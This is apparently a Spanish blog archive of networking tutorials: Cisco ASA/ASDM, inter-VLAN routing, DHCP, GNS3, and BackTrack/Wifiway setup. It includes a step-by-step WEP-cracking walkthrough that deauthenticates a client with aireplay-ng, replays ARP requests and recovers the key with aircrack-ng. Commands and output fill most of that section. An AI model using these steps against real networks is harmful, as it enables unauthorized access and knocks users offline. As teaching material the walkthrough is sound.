!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Comienza el proceso de copiado de ASDM.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
16280544 bytes copied in 100.60 secs (162805 bytes/sec)
ciscoasa# conf t
ciscoasa(config)# dir

Directory of disk0:/

2      drwx  4096         02:08:09 Oct 22 2012  log
9      drwx  4096         02:08:14 Oct 22 2012  coredumpinfo
11     -rwx  196          02:08:14 Oct 22 2012  upgrade_startup_errors_201210220208.log
12     -rwx  16280544     02:17:56 Oct 22 2012  asdm-645.bin

268136448 bytes total (251813888 bytes free)



Al finalizar el copiado verificamos.

Especificamos el archivo imagen de ASDM. Una vez que hemos especificado el archivo de imagen ASDM, puede utilizar el comando show asdm image para ver la ubicación y nombre del archivo.
ciscoasa(config)#
ciscoasa(config)# asdm image flash:asdm-645.bin
ciscoasa(config)# end
ciscoasa# wr
Building configuration...
Cryptochecksum: 83e572a4 edd8be50 3a7df498 7eef42ca

2376 bytes copied in 1.50 secs (2376 bytes/sec)
[OK]
ciscoasa#

Acceso al ASDM

Despues habrimos un navegador web para acceder al ASDM por primera vez. En la siguiente imagen se muestra accesando al ASDM.

Accesando al ASDM

La pagina nos muestra tres opciones.

Install ASDM Launcher and Run ASDM: El launcher y ASDM se ejecutaran como aplicaciones nativas desde la PC sin necesidad de un navegador web.

Run ASDM: Ejecutara ASDM desde el navegador web como una aplicación Java.

Run Startup Wizard: ASDM iniciará un asistente que nos guiará a través de la configuracion inicial de ASA,
si aún no se ha hecho.

La primera opcion es la mas comun y se debe realizar solo una vez. Ya que tengamos instalado Cisco ASDM-IDM Launcher en nuestra PC ya podremos ejecutar la aplicacion directamente para iniciar una sesion ASDM. La primera opción es la opción más común y se debe hacer sólo una vez. Después de la aplicación Launcher está instalado, puede ejecutarlo directamente para iniciar una sesión de ASDM.

Para iniciar una sesion ejecutamos esta aplicacion el cual nos pedirá la direccion IP, nombre de usuario y contraseña. La dirección IP será almacenada en memoria caché para que la proxima vez que queramos iniciar sesion podamos elegirla de nuevo.

Aplicacion ASDM Launcher

Una vez que lanzamos esta aplicación se conecta al ASA correctamente y con esto ya tenemos ASDM listo para trabajar.

Routing entre VLANs (InterVLAN Routing)

Configurar el siguiente escenario. Donde tenemos dos Switches, en cada uno de los switches configuraremos dos VLANs, uno con nombre de vlan10 y el segundo con nombre de vlan20. Cada uno de los switches tendra conectado un host, el primero switch tendra un host que estara en la vlan10 y el segundo switch tendra otro host que estara en la vlan20.
Inter-VLAN Routing
Para que halla comunicación entre vlans en diferentes segmentos de red necesitaremos un dispositivo de capa 3, un router con como se ve en la imagen. A este router le configuraremos dos subinterfaces el cual nos ayudara a que halla comunicion entre vlans.

Inter-VLAN Routing en GNS3
Lo primero que haremos es crear dos vlan en cada switch (sin el VTP).
SW1(config)#vlan 10
SW1(config-vlan)#name VLAN10
SW1(config-vlan)#vlan 20
SW1(config-vlan)#name VLAN20
SW1(config-vlan)#end

SW2(config)#vlan 10
SW2(config-vlan)#name VLAN10
SW2(config-vlan)#vlan 20
SW2(config-vlan)#name VLAN20
SW2(config-vlan)#end
Verificamos
SW1#show vlan-sw
VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa1/0, Fa1/1, Fa1/2, Fa1/3
                                                Fa1/4, Fa1/5, Fa1/6, Fa1/7
                                                Fa1/8, Fa1/9, Fa1/10, Fa1/11
                                                Fa1/12, Fa1/13, Fa1/14, Fa1/15
10   VLAN10                           active   
20   VLAN20                           active   
1002 fddi-default                     act/unsup
1003 token-ring-default               act/unsup
1004 fddinet-default                  act/unsup
1005 trnet-default                    act/unsup
Una vez creada las VLANs, ahora las asignaremos a los puertos.
SW1(config)#int f1/3
SW1(config-if)#switchport access vlan 10
SW1(config-if)#end
SW1#show vlan-sw brief
VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa1/0, Fa1/1, Fa1/2, Fa1/4
                                                Fa1/5, Fa1/6, Fa1/7, Fa1/8
                                                Fa1/9, Fa1/10, Fa1/11, Fa1/12
                                                Fa1/13, Fa1/14, Fa1/15
10   VLAN10                           active    Fa1/3
20   VLAN20                           active   
1002 fddi-default                     act/unsup
1003 token-ring-default               act/unsup
1004 fddinet-default                  act/unsup
1005 trnet-default                    act/unsup
SW2(config)#int f1/2
SW2(config-if)#switchport access vlan 20
SW2(config-if)#end
SW2#show vlan-sw brief
VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa1/0, Fa1/1, Fa1/3, Fa1/4
                                                Fa1/5, Fa1/6, Fa1/7, Fa1/8
                                                Fa1/9, Fa1/10, Fa1/11, Fa1/12
                                                Fa1/13, Fa1/14, Fa1/15
10   VLAN10                           active   
20   VLAN20                           active    Fa1/2
1002 fddi-default                     act/unsup
1003 token-ring-default               act/unsup
1004 fddinet-default                  act/unsup
1005 trnet-default                    act/unsup
Configuramos los Puertos en modo Trunk.
SW1(config)#int f1/2
SW1(config-if)#switchport mode trunk
SW1(config)#int f1/1
SW1(config-if)#switchport trunk encapsulation dot1q
SW1(config-if)#switchport mode trunk
SW1(config-if)#end
SW1#show int trunk

Port      Mode         Encapsulation  Status        Native vlan
Fa1/1     on           802.1q         trunking      1
Fa1/2     on           802.1q         trunking      1

Port      Vlans allowed on trunk
Fa1/1     1-4094
Fa1/2     1-4094

Port      Vlans allowed and active in management domain
Fa1/1     1,10,20
Fa1/2     1,10,20

Port      Vlans in spanning tree forwarding state and not pruned
Fa1/1     none
Fa1/2     1,10,20
SW2(config)#int f1/1
SW2(config-if)#switchport mode trunk
SW2#show int trunk

Port      Mode         Encapsulation  Status        Native vlan
Fa1/1     on           802.1q         trunking      1

Port      Vlans allowed on trunk
Fa1/1     1-4094

Port      Vlans allowed and active in management domain
Fa1/1     1,10,20

Port      Vlans in spanning tree forwarding state and not pruned
Fa1/1     none
Configuramos el Router
R1(config)#int f0/0
R1(config-if)#no ip address
R1(config-if)#no shutdown
R1(config-if)#int f0/0.10
R1(config-subif)#encapsulation dot1Q 10
R1(config-subif)#ip address 172.17.10.1 255.255.255.0
R1(config-subif)#exit
R1(config)#int f0/0.20
R1(config-subif)#encapsulation dot1Q 20
R1(config-subif)#ip add 172.17.20.1 255.255.255.0
R1(config-subif)#end
R1#show ip int brief
Interface                  IP-Address      OK? Method Status                Protocol
FastEthernet0/0            unassigned      YES manual up                    up     
FastEthernet0/0.10         172.17.10.1     YES manual up                    up     
FastEthernet0/0.20         172.17.20.1     YES manual up                    up     
FastEthernet0/1            unassigned      YES unset  administratively down down   
R1#
Configuramos una IP y el Default Gateway a cada uno de los hosts (qemu host):
PC1:
ifconfig eth0 172.17.10.10 netmask 255.255.255.0 up
route add default gw 172.17.10.1
PC2:
ifconfig eth0 172.17.20.10 netmask 255.255.255.0 up
route add default gw 172.17.20.1
Verificamos con un ping desde cada PC.



Configuración de un Router Cisco como un Servidor DHCP

  • Configuramos una IP a la interface del Servidor
  • Definimos el nombre del Servidor
  • Establecemos el rango de direcciones IPs de la red
  • Definimos la puerta de enlace
  • Define el servidor de nombres DNS
  • Establecemos la dirección(es) dentro del rango que no se debe de asignar
Topologia en GNS3
Servidor DHCP
Server_DHCP#conf t
Server_DHCP(config)#int f0/0
Server_DHCP(config-if)#ip add 192.168.1.1 255.255.255.0
Server_DHCP(config-if)#no shut
Server_DHCP(config-if)#exit
Server_DHCP(config)#ip dhcp pool delfirosales
Server_DHCP(dhcp-config)#network 192.168.1.0 255.255.255.0
Server_DHCP(dhcp-config)#default-route 192.168.1.1
Server_DHCP(dhcp-config)#dns-server 192.168.1.1
Server_DHCP(dhcp-config)#exit
Server_DHCP(config)#ip dhcp excluded-address 192.168.1.1
Configuración en SW, R1, R2
RX#conf t
RX(config)#int f0/0
RX(config-if)#no shut
RX(config-if)#ip address dhcp
RX(config-if)#

*Mar  1 00:00:51.203: %DHCP-6-ADDRESS_ASSIGN: Interface FastEthernet0/0 assigned DHCP address 192.168.1.3, mask 255.255.255.0, hostname R2

Qemu Host (Microcore) utiliza la utilidad udhcpc como cliente dhcp.
Para verificar que se esta ejecutando udhcpc, utilizar el siguiente comando.

ps | grep udhcpc

1649  root  /sbin/udhcpc -b -i eth0 -h box -p /var/run/udhcpc.eth0.pid
1663  root  greep udhcpc

Qemu Host (Microcore) automáticamente detecta la IP.
Por ultimo verificamos.
Server_DHCP#show ip dhcp binding      
Bindings from all pools not associated with VRF:
IP address          Client-ID/              Lease expiration        Type
               Hardware address/
               User name
192.168.1.2         0063.6973.636f.2d63.    Mar 02 2002 12:05 AM    Automatic
               3230.362e.3232.3134.
               2e30.3030.302d.4661.
               302f.30
192.168.1.3         0063.6973.636f.2d63.    Mar 02 2002 12:09 AM    Automatic
               3230.372e.3232.3134.
               2e30.3030.302d.4661.
               302f.30
192.168.1.4         0063.6973.636f.2d63.    Mar 02 2002 12:09 AM    Automatic
               3230.332e.3232.3134.
               2e30.3030.302d.566c.
               31
192.168.1.5         0100.aa00.fa9f.00       Mar 02 2002 12:12 AM    Automatic
Server_DHCP#show ip dhcp pool         

Pool delfirosales :
Utilization mark (high/low)    : 100 / 0
Subnet size (first/next)       : 0 / 0
Total addresses                : 254
Leased addresses               : 4
Pending event                  : none
1 subnet is currently in the pool :
Current index        IP address range                    Leased addresses
192.168.1.6          192.168.1.1      - 192.168.1.254     4
Server_DHCP#

Server_DHCP#show run

!
!
no ip dhcp use vrf connected
ip dhcp excluded-address 192.168.1.1
!
ip dhcp pool delfirosales
network 192.168.1.0 255.255.255.0
default-router 192.168.1.1
dns-server 192.168.1.1
!

Agregar Qemu Host (MicroCore) en GNS3

Qemu Host es una imagen de linea de comando CLI (Microcore) o bien una imagen GUI (Tinycore). Es básicamente una pequeña imagen de Linux que puede ser utilizado para realizar algunas tareas básicas de conectividad como por ejemplo telnel, ssh, route iptables, tcpdump y también soporta IPV6. En este pequeño tutorial se mostrara el proceso de como agregar la imagen de Qemu Host a GNS3.

Herramientas
1. Lo primero que haremos es abrir GNS3 y nos vamos a la opcion de Qemu Host.
Editar - Preferencias - Qemu - Qemu Host
2. Configuramos la topologia de Red

3.Iniciamos el Switch y le configuramos una IP para realizar una prueba de conectividad.

4. Iniciamos Qemu Host y le configuramos una IP.

5. Realizamos la conectividad entre el Switch y Qemu host.

Configurar Default Gateway en Qemu
route add default gw 10.10.10.1
Video Tutorial GNS3: Agregar Qemu Host (MicroCore)

Vídeo Online
http://www.youtube.com/watch?v=6hc5A_qKUGY

Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

En este post veremos como se obtiene la clave WEP de una red inalambrica con un cliente conectado. Para este escenario realizamos dos ataques. El primero sera el ataque 0 o bien la deautenticación que consiste en deautenticar al cliente conectado al Punto de Acceso. El segundo lanzaremos el Ataque 3: Reinyección de una petición ARP (ARP-request) para generar nuevos IVs (vectores de inicialización).

Lo primero es poner la tarjeta en modo monitor.

root@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
(monitor mode enabled on mon0)

root@bt:~#
Una vez puesto la tarjeta en modo monitor con airmon-ng. Ahora toca lanzar la herramienta airodump-ng buscar las redes wifi disponibles. Para esto tecleamos el siguiente comando en consola.

root@bt:~# airodump-ng mon0
CH  8 ][ Elapsed: 0 s ][ 2011-03-18 02:21

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:18:85:C9    5        1        2    0   6  54 . WEP  WEP         WifiAttack

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:18:85:C9  0C:60:76:71:D5:5B    1   54 -54      0        2

root@bt:~#
Como podemos ver tenemos una red disponible y también hay un cliente conectado a dicha red. Ahora lanzamos airodump-ng para que escuche todo el trafico de la red con el nombre de "WifiAttack".

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

Ataque 0: Deautenticación

Ahora toca lanzar el ataque 0 para deautenticar al cliente conectado a la red "WifiAttack". El cliente tiene la direccion MAC 0C:60:76:71:D5:5B. Para esto lanzamos el siguiente comando.

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0
02:27:39  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
02:27:39  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [34|63 ACKs]
02:27:40  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [17|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:42  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [13|63 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [22|65 ACKs]
02:27:44  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [18|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [16|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [14|64 ACKs]
root@bt:~#
El numero 10 es el número de deautenticaciones a enviar. Una vez desasociado el cliente lanzamos el ataque 3 para generar nuevos IVs (vectores de inicialización).

Ataque 3: ARP-Request

Lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0
The interface MAC (00:C0:CA:4A:82:97) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 0C:60:76:71:D5:5B
02:28:07  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Saving ARP requests in replay_arp-0318-022807.cap
You should also start airodump-ng to capture replies.
Read 81421 packets (got 27178 ARP requests and 26333 ACKs), sent 29719 packets...(49
root@bt:~#
Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

Cuando ya tengamos suficientes paquetes de datos (#Data) lanzamos aircrack-ng para crackear la Clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 86840 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  WifiAttack                WEP (19315 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 19477 ivs.

                                  Aircrack-ng 1.1 r1738

                     [00:00:00] Tested 4 keys (got 19189 IVs)

 KB    depth   byte(vote)
 0    0/  1    76(26624) 1E(26112) 4D(25088) E6(24576) A5(24064) 25(23808) 36(23808
 1    0/  2    53(26368) 78(26112) 92(24832) BD(24320) 1A(23808) 0B(23552) 59(23552
 2    0/  2    95(25856) C1(25856) 3E(25088) BB(24064) DD(24064) BF(23296) ED(23296
 3    0/  1    92(27392) 40(25088) 08(24576) 45(23808) 8F(23808) 20(23296) 97(23296
 4    0/  1    80(27392) F2(26112) 46(24832) 4D(24576) 71(24576) 0E(24320) 85(24064

                       KEY FOUND! [ 76:02:95:92:80 ]
       Decrypted correctly: 100%
Después de tener algunos problemas con la instalación de Wifiway 2.0.1 en VMware, principalmente problemas con el GRUB, al fin he logrado instalarlo. La solución la encontré en este post del foro Seguridad Wireless, el detalle es tener que hacer las particiones utilizando cfdisk de Wifiway 1.0 final.

Por si alguien no sabe como instalarlo o tiene algunos problemas en la instalación de Wifiway, he realizado este vídeo. El vídeo muestra como instalar Wifiway 2.0.1 en VMware Workstation específicamente en la versión 7.1.2 build-301548.

En resumen, los pasos para instalar Wifiway 2.0.1, tal como lo menciona el usuario wepain, son los siguiente.
  1. Iniciar con LiveCD Wifiway 1.0 Final
  2. Escribir cfdisk /dev/tudiscoduroaqui
  3. Crear la partición linux y la partición swap
  4. Escribir en la tabla de particiones
  5. Ejecutar mkfs -t ext3 /dev/tuparticionwifiway
  6. Ejecutar mkswap /dev/tuparticionswap
  7. Ejecutar poweroff -f
  8. Iniciar con LiveCD WifiWay 2.0.1
  9. Instalar wifiway
  10. Configurar grub y el error ya no aparece.
Herramientas
  • Wifiway 1.0 final
  • Wifiway 2.0.1
  • VMware Workstation
VMware Workstation 7.1.2 build-301548
http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0
Para descargar Wifiway 2.0.1 existen 2 alternativas, una LiveCD normal y una versión compacta para los equipos con menos capacidad, así que descargar la versión que mejor se adapte a sus caracteristicas.

Comandos

wifiway ~ # startx
wifiway ~ # fdisk -l
wifiway ~ # cfdisk /dev/sda
wifiway ~ # fdisk -l
wifiway ~ # mkfs -t ext3 /dev/sda2
wifiway ~ # mkswap /dev/sda5
wifiway ~ # poweroff
Una vez instalado, iniciar sesión con los siguientes comandos.
wifiway login: root
Password: toor
wifiway ~ # startx
Video Online
http://www.youtube.com/watch?v=k4cXtocnWFQ

Este vídeo muestra como instalar un conjunto de controladores y aplicaciones llamadas "VMware Tools" que aceleran notablemente el rendimiento de la maquina virtual es por eso muy importante instalar estas herramientas de VMware en el sistema virtualizado. Aquí se muestran los pasos para instalar los VMware Tools en BackTrack 4 r2, la version utilizada de VMware Workstation es la versión 7.1.2 build-301548.

Para instalar los VMware Tools solo tienes que localizarte en la carpeta donde los hallas descomprimido y ejecutar el siguiente comando.
./vmware-install.pl
En mi caso /root/vmware-tools-distrib
root@bt:~/vmware-tools-distrib# ./vmware-install.pl

Video Online
http://www.youtube.com/watch?v=GSiftUkH-Jw
Este vídeo muestra como instalar BackTrack 4 R2 en VMware Workstation, así como actualizarlo y alguno que otro ajuste mas. Estos pasos mostrados en este vídeo también puede ser de utilidad para instalar BackTrack en una maquina real.

Herramientas Utilizadas
  • BackTrack
  • VMware Workstation
BackTrack 4 R2 (bt4-r2.iso)
http://www.backtrack-linux.org/downloads/
VMware Workstation 7.1.2 build-301548
http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0

Comandos
root@bt:~# startx
root@bt:~# xrandr -s 1280x720 (comando opcional, es para aumentar la resolución de la pantalla)
bt login: root
Password: toor
root@bt:~# startx
root@bt:~# iwconfig
root@bt:~# dhclient eth0
root@bt:~# apt-get update
Video Online
http://www.youtube.com/watch?v=m038Ss07n-c

En este video se muestra la solución al error lanzado en vmware sobre el driver rtl8187.
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132

 (monitor mode enabled on mon0)

Video Solucion: Backtrack mode Monitor rtl8187 - SIOCSIFFLAGS: Unknown error 132


El archivo "blacklist" debe quedar de la siguiente manera
# This file lists those modules which we don't want to be loaded by
# alias expansion, usually so some other driver will be loaded for the
# device instead.

# evbug is a debug tool that should be loaded explicitly
blacklist evbug
blacklist pcspkr

# these drivers are very simple, the HID drivers are usually preferred
blacklist usbmouse
blacklist usbkbd

# replaced by e100
blacklist eepro100

# replaced by tulip
blacklist de4x5

# causes no end of confusion by creating unexpected network interfaces
blacklist eth1394

# snd_intel8x0m can interfere with snd_intel8x0, doesn't seem to support much
# hardware on its own (Ubuntu bug #2011, #6810)
blacklist snd_intel8x0m

# Conflicts with dvb driver (which is better for handling this device)
blacklist snd_aw2

# causes failure to suspend on HP compaq nc6000 (Ubuntu: #10306)
blacklist i2c_i801

# replaced by p54pci
blacklist prism54

# replaced by b43 and ssb.
blacklist bcm43xx

# most apps now use garmin usb driver directly (Ubuntu: #114565)
blacklist garmin_gps

# replaced by asus-laptop (Ubuntu: #184721)
blacklist asus_acpi

# low-quality, just noise when being used for sound playback, causes
# hangs at desktop session start (Ubuntu: #246969)
blacklist snd_pcsp
blacklist rt73
blacklist ath_pci
#blacklist r8187
blacklist rt3070sta
blacklist rt2870sta
blacklist arusb_lnx
blacklist ath_pci
#blacklist r8187
blacklist rt73
blacklist rtl8187
Archivo "blacklist" localizado en /etc/modprobe.d/blacklist

Instalación de Firefox 3.5 en Backtrack 4 Pre final

Ubuntuzilla es un script hecho en Phython que nos permite instalar las últimas versiones de Firefox, SeaMonkey y Thunderbird en Ubuntu y como Backtrack 4 pre Final se basa en Intrepid Ibex podemos instalar firefoz 3.5 a travez de este script.

Ademas tiene las siguientes ventajas:
  • Nos deja escoger el idioma al momento de la instalación
  • Pone el Firefox 3.5 como nuestro navegador por defecto
  • Integra todos los plugins que tengas instalados.
  • Detecta automáticamente las últimas versiones de Firefox, Thunderbird y Seamonkey de los servidores de Mozilla
  • Verifica la autenticidad de la firma GPG de Firefox y Thunderbird, para evitar paquetes corruptos o peligrosos.
  • Hace un respaldo con fecha de los perfiles de Firefox, Seamonkey y Thunderbird
  • Puedes desinstalar las aplicaciones y todo quedará como en el momento que las instalaste.
  • Se actualiza automáticamente.
Asi que vamos a ver como instalarlo en nuestro backtrack 4 pre Final siguiendo los siguientes pasos.

Descargamos el instalador Ubuntuzilla desde Sourceforge y pasamos a instalarlo utilizando dpkg y apt-get para resolver las dependencias (ignorar las advertencias mientras se ejecuta dpkg).

# wget http://downloads.sourceforge.net/sourceforge/ubuntuzilla/ubuntuzilla-4.6.1-0ubuntu1-i386.deb?use_mirror=surfnet
# dpkg -i ubuntuzilla-4.6.1-0ubuntu1-i386.deb
# apt-get install -f




En esta seccion #Do you want to continue [Y/n]?# tecleamos una y.


Una vez hecho lo anterior pasamos a instalar la ultima version de firefox haciendo en consola lo siguiente.

# ubuntuzilla.py -a install -p firefox


Tecleamos una "y" para proceder con la instalacion de firefox.

